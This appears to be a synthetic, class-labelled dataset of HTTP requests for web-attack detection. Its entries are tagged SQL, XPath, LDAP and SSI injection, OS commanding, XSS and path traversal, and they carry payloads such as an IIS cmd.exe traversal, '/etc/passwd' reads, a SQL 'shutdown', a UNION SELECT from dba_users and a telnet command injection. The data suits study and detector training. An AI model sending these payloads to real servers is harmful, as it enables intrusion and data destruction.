Cookie: nel=rnvt26g;G6Ew=205438;euit2=2783374
Cookie2: $Version="55"
Date: Wed, 06 Dec 06 10:36:13 CET
ETag: W/"xQ73VO@JK@4R4B4"
Expect: shdr
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Sun, 31 Dec 06 23:38:06 UTC
If-Match: *
If-None-Match: "etZty1Mvx6yWfzC"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 51
MIME-Version: 7.3
Pragma: httinte9='sk3omm'
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: http://www.dst9.net/aoet8sae/2raesme/eeafhge/cmhEps.swf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.6 (compatible; Konqueror/6.9; Win98; 5Ree7oaxg)
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/9.8 171.243.31.230
Transfer-Encoding: hAgbh
Upgrade: flm/9.9, tbo/3.7, uGo8c3/3.1
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ohAshu=685644&wGhdhIphwokghh=%u&seisditt=eYyqT&0msreyT=957943354&ltr=dXeJmUWf&l39H4WFG2=8d'   or 1<     rmn/eSdli/e/child::text()[position()=75]     or    'TdthlRE'  =  '&dsrteo19yeunhh=dDo&at3uyIdkbidb=&]b td0iaytqqsipnmfu&naa9oIflt=tAA4Hac6XG&meuiz=mq9W&A8E@=aB7bdGFZ&SeWoe=trr&rnitEF8eqjnZn=vhaving80(Eseiar&t5arrtg=dr0XSUe&9aeonqa6mrEty=eda7p2xSe

End - Id: 48648
Start - Id: 40846
class: SSI
GET /bEgEl/tjftr6yfele/lIs/6k1pml/xECUigAOK4Qot8Fh@jo/uRNetEp65mtfa/nn3isty/0awpk/CSFPedmIbin@/jqthKhzfINTZN.9q.php3?faus=dt&ipmoeehla4o=8582338&1npositionR=pEAANS4&t3hNesa=tlaf&ievodiaadsle=814&zrCWhsNdqwz5h=%3C%21--++++%23odbc++++statement++%3D+++%22select+++++nyeeedm%2C+++++aear%2C++be+from+++rArft+order+++++by++3%2C+++++04%2C++4%22++++--%3E&oiehedfset=rifgy&ldihleyesuzthec=112938&tsttriae=06483&ffawOn=c&3h7aq9n9ts=iframey&Eoc=+fin%278mIw8t61w&7w8UoKkfndMQ=ihrotaavtt1yaiexrd&A5n=15 HTTP/1.0
Host: www.oPit.ch
Connection: keep-alive
Accept: text/plain;q=0.6
Accept-Charset: iso-8859-8;q=0.6
Accept-Encoding: gzip
Accept-Language: t-isze;q=0.7, Eddic3Y-oTsizlnv;q=0.5, rhn-DGer, h-u;q=0.4
Cache-Control: no-store
Client-ip: 183.188.60.40
Cookie: 6eeH=227464225
Cookie2: $Version="28"
Date: Thu, 18 Feb 10 15:20:27 UTC
ETag: "c4DJWXpb1.Q0Ita"
Expect: un3h
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Tue, 08 Feb 05 05:48:23 UTC
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 1.5
Pragma: owspp='oe2s7k'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: http://e2zzmr.gov/ot7eqphe/obsuu/cnhojgl/nfTt/auogA1Ob.jsp
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: aHZW_wj http://www.ori0no8D.de
UA-CPU: PowerPC
UA-Disp: 7505,615,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: gEtrz/1.4 www.cnDsiAr.jpg
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 895 www.misa5.html "rhe6s4bantnhdot" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 938964588863184564
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40846
Start - Id: 39965
class: SSI
GET /ehEelepueNWau/tiBNYAmo/it9BFsyQb.tiff?ddi4etEze=6jRdZ%40UGG&c0oreotrTty=teDFiwi&hddyrmaDdiaRe=Od+eo+rconnectf&h63eaedtltiht=7ar&7YadocumentYuK58processing-instruction=eae%40rzfelrOmiee&mtf=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2F5hoe%2Fa5aas8%22+++--%3E&sock_streamX9passwd=nbee&rddlnetrslry2=rdxRVvamKd%402 HTTP/1.0
Host: www.awftm.com:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1257;q=0.6, iso-2022-jp
Accept-Encoding: *;q=0.2
Accept-Language: aa-ede, aenLto-ttsWAtsm, e-Itbqa;q=0.2
Cache-Control: max-stale=50393
Client-ip: 183.52.12.49
Cookie: urlorxs=aeotroaS8L;leueauDgAt=3656;jun=4
Cookie2: $Version="03"
Date: Sun, 07 Aug 05 17:10:06 CET
ETag: W/"Nu6lFddZ0hfIrZR"
Expect: 100-continue
From: ebwhssyt@lxhcar.gov
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Tue, 25 Sep 07 09:40:17 GMT
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: o=s8aa
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://www.ldza2g.net/noqcd/tm2Sr/re4r8lg.sh
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: or57zTV-nv http://www.veo0qIa.st
UA-CPU: Sparc
UA-Color: color16
Via: 7.0 226.232.160.153, FTP/7.8 68.234.143.202
Transfer-Encoding: deflate
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39965
Start - Id: 49523
class: XPathInjection
GET /1incnHgswyqhLr/uQPF/ysfosAti/5tuBt/rHlURT.dll?s8mavonnltr2tto=44403&IWOT5wN=toIMr&idme=atuw%7Csze&srttb9psr=349572439&3a=4inserti90iRne%27&nDcoo=007&0Deai=0461346&xAYo@SdeleteZs_N0=oD%3D%3BtdD+e5gm&xhhtdp=phpn6igcia+clogs3&e3=nP%27+++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27mtes%27%3D++++%27 HTTP/1.1
Host: www.ohtati.cz
Connection: xi5dn
Accept: video/*, text/xml
Accept-Charset: iso-8859-3;q=0.6
Accept-Encoding: gzip;q=0.7, gzip;q=0.7, compress, gzip
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 236.52.73.161
Cookie: em8i3ylhit=mS_qLb;e5=19
Cookie2: $Version="709"
Date: Wed, 26 May 04 19:12:38 GMT
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Fri, 27 Aug 04 21:17:18 CET
If-Match: "WIO@SN6pQdEIb0fNX"
If-None-Match: *
If-Range: *
Max-Forwards: 0267
MIME-Version: 4.3
Pragma: rsoeut='5at'
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: /bssrT/4qstf/thhkl/tf86/saasFhni.php4
TE: deflate;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/0.0 (Windows; U; Win98 9.1; ql-oe; rv:8.1.5) Gecko/71647075
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5470x3164
Via: FTP/0.2 149.237.108.180, 8.7 250.163.48.75, FTP/6.8 195.117.81.231:431
Transfer-Encoding: compress
Upgrade: 2ao/4.8
Warning: 159 80.118.128.49 "egeLeoxihuinfidnnn3" "Fri, 16 May 08 05:37:47 CET"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49523
Start - Id: 44399
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 125.78.218.109
Connection: keep-alive
Accept: video/mpeg;q=0.6, video/quicktime, video/*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.3, identity;q=0.0, identity;q=0.9
Accept-Language: *
Cache-Control: ai=ahc5
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="556"
Date: Mon, 23 Feb 09 09:05:49 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 15 May 04 08:04:34 UTC
If-Unmodified-Since: Sat, 07 Mar 09 14:04:13 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: *
If-Range: *
Max-Forwards: 7241
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM aTNocnRjZ2hwaTVlaW5oOEVyNGVhZHI1aWVhYW9lZG9lMXRjU3BpYW9lYXNhaA==
Range: 6-459,-64787
Referer: http://6orTz.de/sptn/eben.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: nydoGo (nnPTB_QhlL)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 9.7 47.97.212.112:2955, 2.9 www.rda3n.shtml
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 354 118.238.114.197 "eyha0hehiihomqhzgiu0" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44399
Start - Id: 35518
class: XPathInjection
POST /nnWQJ/8Rexecp_qkvlDVQIlib/eyzsgCeL9M/oebw8sffasRr56wutido/-10dr/pvn/e8MZ8ghY18M/Jk/gGaXAazb0EF_B9mp5l.cgi? HTTP/1.0
Content-Length: 259
Content-Language: 1itere,mnTR,sppmns7
Content-Encoding: identity
Content-MD5: cGFXYVRlbnRpdHI0RW9pSw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 11 Jun 05 09:18:07 UTC
Host: 251.58.133.162:5
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: Iuy-Ayne, ze8lk-prnemeae;q=0.3, a-ersett, tdIi-wtt;q=0.2, lab-xsRpaoi;q=0.6
Date: Wed, 22 Aug 07 20:41:49 CET
Expect: 100-continue
If-Unmodified-Since: Tue, 20 Oct 09 07:26:13 GMT
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: *
If-Range: *
Max-Forwards: 903
Pragma: no-cache
Authorization: akeOn fdLzir=oeqt
Referer: /f6em/reda.sh
Trailer: Pragma
User-Agent: Mozilla/2.4 (Windows; U; Win98 8.0; en-st; rv:0.6.1) Gecko/31680403
UA-Disp: 740,794,8
Transfer-Encoding: identity

nLci=1777&pgpn0=s(objectaKpadeletedo&teYnoelea=lhNee&iewze=>admin&keee=628771&3oet=8626&swAb9WWq.beq=98&grtLrwinntB5bd=95823    or     1<    b1/ec/50lur/child::text()[position()=85] or   9='] | /* | /foo[bar='

End - Id: 35518
Start - Id: 37167
class: LdapInjection
GET /t4j.asp?XV-W=msr3accepth+is+positionCeoexec&sG6l=19214&ps6leensrse4hY=ik-TSojuf&oogf=%29++%28++++%7C++%28tkU%3D9tlt*%29&a7hN=c&OJ6p0RjoqD=xleeauddet2r9hsc&oeceahtpii=2&auu=9eUcb%3Fh HTTP/1.1
Host: www.neoqotn34.net
Connection: ii70Tc
Accept: */*;q=0.5
Accept-Charset: iso-8859-3
Accept-Encoding: compress;q=0.7, identity;q=0.9
Accept-Language: ndRz-4xTysari, tn8ifet-e1p;q=0.3
Cache-Control: no-cache
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Wed, 25 Oct 06 18:38:23 CET
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: eGqmep=9at5aun;pdiah=wrena
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: Wed, 12 Jul 06 17:51:52 GMT
Max-Forwards: 0970
MIME-Version: 5.3
Pragma: sr='h'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Digest algorithm=MD5
Range: 183458-,10781-99705
Referer: http://nwd4TEeq.net/izntlsh3/urfd/tipta.bin
TE: trailers
Trailer: Via
User-Agent: iihtys/3.9.3
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: FTP/0.9 www.uwlKnn.js, 0.6 166.59.1.110
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37167
Start - Id: 35301
class: SqlInjection
GET /N6aaer/1sbWI/giesid/huKq.3UTvE2Vy/keosUDdnitiomor/sC/jh@3F.js?nibauyenti=%7Ep&oNrdrn0t4ivi5y=%27%3B++++shutdown--&irqexxCdas=N%3Fs HTTP/1.1
Host: www.idcvxagi.fr
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-936, big5;q=0.8
Accept-Encoding: identity
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="04"
Date: Tue, 31 Mar 09 19:43:48 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: nhtud3@oxbjd.com
If-Modified-Since: Mon, 07 Apr 08 14:36:06 GMT
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: "@Rz5jkyRfCO5NwkJ0P"
If-None-Match: "bcW8OHFOXE6cE@0i1"
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 2
MIME-Version: 2.4
Pragma: sBftho='Hl'
Proxy-Authorization: Digest opaque="wwob"
Authorization: cXoqh tssae=ttshhkh
Range: -6,470-,89626-1
Referer: /2txe/ilheyXv.txt
TE: trailers,trailers
Trailer: Range
User-Agent: ihxT/1.5.0.1.8
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: HTTP/9.4 75.104.60.73, HTTP/6.0 www.cfjseaab.shtml:1, 5.4 www.eenxdY2.html
Transfer-Encoding: nnppi; oeei=un9esas
Upgrade: dn44o/1.3
Warning: 196 www.nlePzsap.css:26 "ocnorS3ta4heNl" "Tue, 12 Jul 05 07:48:44 CET"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35301
Start - Id: 47117
class: XSS
GET /a-Z8Bzs.rGlI2/tyyZguii6/aBzkVsx15HH/ckmi6c4i/GruobohP/n6uWRB2qU@lR@DU/e_R/aisGet/zeX/hrbue6.php4?DetkeghlEcnc5f8=%3Ciframe+src+++%3D+%22vbscript%3A%5Balert+%28%27RneGa%27%29%3B%5D+++++%22++++%3E&0ia3e=y5r2e HTTP/1.0
Host: www.vacttgfde.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nbeIg9-rghe1x, isegzjh-7;q=0.5, qe6ot-hUpc2prO;q=0.4
Cache-Control: max-stale
Client-ip: 223.238.139.168
Cookie: CmRcUhtaccesTnYIB=t;3eSbRtsrReas=7XVqfk7
Cookie2: $Version="0"
Date: Mon, 15 Jan 07 08:42:33 GMT
ETag: W/"2w0lEfvBfkDGQbZ22V20"
Expect: eeOu
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 08 Jan 10 17:46:25 GMT
If-Unmodified-Since: Sat, 08 Apr 06 12:50:01 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Jun 06 07:57:43 CET
Max-Forwards: 93
MIME-Version: 7.3
Pragma: 8=B
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: /6sodpNg.rar
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.2 (compatible; Konqueror/2.3; Win 9x; Rennl; ittiwSeuSi; clpLtu)
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/0.9 146.105.44.113:2791
Transfer-Encoding: identity
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47117
Start - Id: 45992
class: PathTransversal
PUT /QjCjaccess_logD/1ePmaebevDy/nslitpr/4eu/cfevxqEAJ9bUu/aZnhnlezriOaT1sft/sc2.css? HTTP/1.1
Content-Length: 102
Content-Language: lstiTes,f
Content-Encoding: identity
Content-Location: /6eeqlj.png
Content-MD5: ZUpvbWFpZ255aXVhc2lycg==
Content-Type: application/x-www-form-urlencoded
Host: 181.189.34.105
Connection: close
Accept: image/jpeg;q=0.6, video/quicktime;q=0.4, text/xml
Accept-Charset: iso-8859-8;q=0.0, utf-7, iso-8859-2
Accept-Language: aeeiudas-ztrcf;q=0.2, pexnutR-eei, hanethx-Euobt0oa;q=0.6, i-a6lrad;q=0.1, eas-pead07st
Cookie: mzehdsTxesat=iIkQH;vahoswaE4kzunet=69279526;mEFasgnn=aMfNw;jhaeyr=hyfvaernocfxmlciph
If-None-Match: *
If-Range: "a9R6LzCy-@TuYhgUJvWY"
Max-Forwards: 352
Pragma: tAfncBM='8eutgsee'
Proxy-Authorization: Basic dGxoZHI6dGxudWVvbw==
Authorization: dey2 afeEufp=wyertsaY
Referer: http://rdtfiEk1.uk/aeDo3cy/iejeh/ee3ae8R.jsp
User-Agent: 7:\windows\boot.ini
Upgrade: 7ec/8.8, oiic/3.9, bdiee/9.5, 5gsetd/6.4

eiasrouyetle=w6 c@tz&dl=~lcdocumentfevalase3zi6h0arerh&GnodedMVqRK=uorpoetslpth&tmpyc=dunorzsEy8IN

End - Id: 45992
Start - Id: 35159
class: SqlInjection
POST /getc/vEh89e.png? HTTP/1.1
Content-Length: 266
Content-Language: o2,zRxv,nfetapt
Content-Encoding: deflate
Content-Location: http://www.a3l8.de/tztu/Ue8tieij.cfm
Content-MD5: MmlpYXRuZXM2T3loNGlvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Sun, 12 Jun 05 23:53:54 CET
Host: www.erodic.be
Connection: tenthLea
Accept: */*
Accept-Charset: windows-1257;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=2465
Client-ip: 230.250.218.171
Cookie: ibhmhmmR=u]u8Iow;inputhttp5vacceptjy=wrhiexec;aOoEfanwdotaw=cadKAaKstwoajr;D7nrafu3no=525;sas=41463573;ndh8ln7olrI=t
Cookie2: $Version="6"
Date: Thu, 25 Sep 08 13:39:12 CET
ETag: "MNa@-a68w9FVcPZY"
Expect: eel5Noee
From: anhmtngo@bn2cthLk.biz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Tue, 03 Feb 09 05:27:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 242
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest nc=53a07585
Range: 9528-,8139-
Referer: /alrfsre.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 3.9; Nh-nx; rv:9.4.3) Gecko/62672638
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 3.9 179.163.22.171, 6.7 148.67.159.254
Transfer-Encoding: deflate
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 616 www.siai.png "ttlplonce" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 0448901461
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

imd=arxt&Noieroa3bclto2v=86&xa=n4tYW-QVxl&-as5q=scynoM&IbesitwtpiaEa=52&7X3wApasswdbli=fu'   UNION    /**/    SELECT    tf  FROM   dba_users     WHERE ttw     like     '%25&eBKL=cZhi&zr3E2s.wEP=lapni)&VPYeiVycl=mhrp8tldoi9eu61i&rltxtetxi0rr=do&e3=3173208

End - Id: 35159
Start - Id: 43068
class: OsCommanding
POST /lSFJOxKAnXTI/BZ7tboot.iniLWz5QiAD5A/druUNVv85tsu/6_Q/k3var3EvgMaMNlMSP/q1TqzRF/2aeuAles3czyke4dHann/Tg/etBt2YtNWzVH8D.asp? HTTP/1.1
Content-Length: 60
Content-Language: adkjsns,feLuf,htenheo
Content-Encoding: identity
Content-Location: /nehEgv/sepw4Cn/1Cksevtr.asmx
Content-MD5: aW9haWV0ZXRuTjc4cmhlag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Sun, 22 Jul 07 02:42:10 GMT
Host: 222.196.36.3
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.3, iso-8859-7, x-mac-roman
Accept-Encoding: *
Accept-Language: vgaset-Ra;q=0.5, fw4r-ssrthier;q=0.1, aoifM-1docgagy, dnvc-int, O-tsinN
Cache-Control: max-stale=0
Client-ip: 159.80.6.131
Cookie: ueatc=pxaa;34RXdBT7r=1kiBv;tse=7377;mq6lOsat6ta=hcR9pplagk;en212bboevtdtdI=hio
Cookie2: $Version="1"
Date: Sun, 08 Nov 09 23:23:35 UTC
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: ni1y
From: sTleEdu@dtAttFd.de
If-Modified-Since: Mon, 12 Jul 04 03:02:08 CET
If-Unmodified-Since: Mon, 17 Aug 09 08:57:21 GMT
If-Match: "yELw96P@2kUYhHnCzF"
If-None-Match: *
If-Range: Fri, 16 Apr 04 05:08:31 GMT
Max-Forwards: 2
MIME-Version: 7.0
Pragma: hhx='maua'
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: Basic MGljYUlyOm9pbTRjZW14
Range: 53-,7351-3480
Referer: http://zmoe.be/gussq/inknnhos/xtotjlic/vLyicsm/nheinhr.bin
TE: trailers
Trailer: Accept
User-Agent: alfizrSmuu
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: deflate
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teez6cftpO="     ;  telnet     10.236.214.174   80   ;

End - Id: 43068
Start - Id: 46204
class: PathTransversal
GET /y3fUjmSuQeYMhtacces/hx4BT2W.LInDhttpG5/4tsesoat46atIishue9/nSw/36PvAsQngVz6tm4HS/mfOPtwcu/rRKQVCV/O1/sZvnXsZ0xY2GwAtaLT/ygF/fo7InhoqSltriroyt.bin?oeie=5fblutperlh+&tthbdHir0ieqeh=9ZU3pft2-zhaaalyaIuh&hOmre3wjd=o0oOEp.e&tdledin=cddchtezm&iq=%2Fetc%2Fpasswd&H@varR0dacceptLBZgP=o80tFiOqQ&neuolmuaon4=186&1te7=46139152 HTTP/1.0
Host: www.a0qpr.ch
Connection: txna6sut
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mhgre-r9od, htHfets2-ahn
Cache-Control: min-fresh=295
Client-ip: 116.139.98.213
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="43"
Date: Sat, 02 Jan 10 15:13:48 GMT
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: "EeC9TmUiC5mCDt36AMO"
If-Range: "zqUu0-3EU3ISXYcO"
Max-Forwards: 26
MIME-Version: 3.0
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: NTLM dHRmOW9pdHNFVG4xbWh3dG5BZW5vMmFuMDJ5QWRlbGg3dUU=
Range: 684-,-674552,060-
Referer: /h3att.ace
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/8.3 (compatible; e0cnlainn; Open BSD i586; byst)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46204
Start - Id: 46861
class: XSS
POST /ertetnm0TNrtsEtmlpen/bwV/iiepXsEsd_XPZeG.js6/h8VMr1j/K4vTMQFEAMb_wC/m3ezMz@t9zYkjw@bj55/imgZ3T1I7R2l_Py3/u4e/lCh_CbY@3UXtLYsv8i.swf? HTTP/1.0
Content-Length: 134
Content-Language: noEiiy
Content-Encoding: compress
Content-Location: /chcDi/voArir.gif
Content-MD5: ZWF6am9lZW51aGdoZXN2Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Sat, 24 Apr 04 10:42:27 GMT
Host: 90.181.47.16
Connection: aTwzca
Accept: audio/x-wav, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: snsbeIa-bubefeoa, Hpejthfg-ha0ebm;q=0.9, 57hdnhe-en;q=0.5, hn5rt-t;q=0.4
Cache-Control: max-age=09
Client-ip: 152.154.47.47
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="96"
Date: Tue, 19 May 09 02:48:46 UTC
ETag: "ynNtDqxUiypefBzDU"
Expect: ascq
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Wed, 19 Jul 06 09:52:22 GMT
If-Match: *
If-None-Match: "tLkibM2jgQvBLqQxqbD"
If-Range: "wMw6b5567-fDgQ-5d"
Max-Forwards: 2853
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 6262-,10870-70169
Referer: http://tlhp.uk/snYse/6no6anr/dNitNuzs.mspx
TE: gzip,trailers
Trailer: Referer
User-Agent: tfzFXN http://www.vsdl.it
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 758x384
Via: 2.9 www.tn6tm.css:26767, wlea/9.5 21.7.6.182, gnnh/8.8 www.flrk.shtml:240
Transfer-Encoding: gzip
Upgrade: enf/4.8, aeoeoi/9.1, d2aRmj/2.6
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UlikewRLuovbscriptQcv=<div   style="     behaviour:    url([http://www.ri.com/script/soe.aspx]);  "  >

End - Id: 46861
Start - Id: 35940
class: PathTransversal
